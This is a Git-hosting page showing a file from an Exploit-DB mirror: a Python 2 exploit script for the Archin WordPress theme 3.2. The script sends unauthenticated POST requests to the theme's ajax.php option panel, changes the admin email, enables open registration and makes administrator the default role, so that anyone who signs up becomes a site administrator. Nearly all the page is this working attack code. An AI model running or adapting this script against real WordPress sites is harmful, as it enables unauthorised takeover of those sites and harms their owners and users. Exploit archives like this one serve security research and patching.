bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/21646.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

29 lines
No EOL
1.2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
Reference in a new issue View git blame Copy permalink